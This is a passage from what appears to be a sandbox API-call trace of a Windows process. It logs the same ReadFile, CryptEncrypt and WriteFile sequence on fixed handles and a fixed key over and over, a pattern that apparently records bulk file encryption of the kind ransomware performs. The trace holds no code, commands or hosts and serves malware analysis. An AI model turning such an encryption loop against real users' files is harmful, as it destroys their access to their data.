hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.279] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.279] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.279] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.279] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.280] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.280] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.280] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.280] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.280] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.280] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.281] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.281] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.281] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.281] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.281] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.282] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.282] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.282] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.282] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.282] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.282] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.282] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.282] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.283] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.283] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.283] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.283] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.283] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.284] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.284] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.284] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.284] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.284] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.284] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.285] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.285] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.285] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.285] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.285] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.286] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.286] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.286] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.286] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.286] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 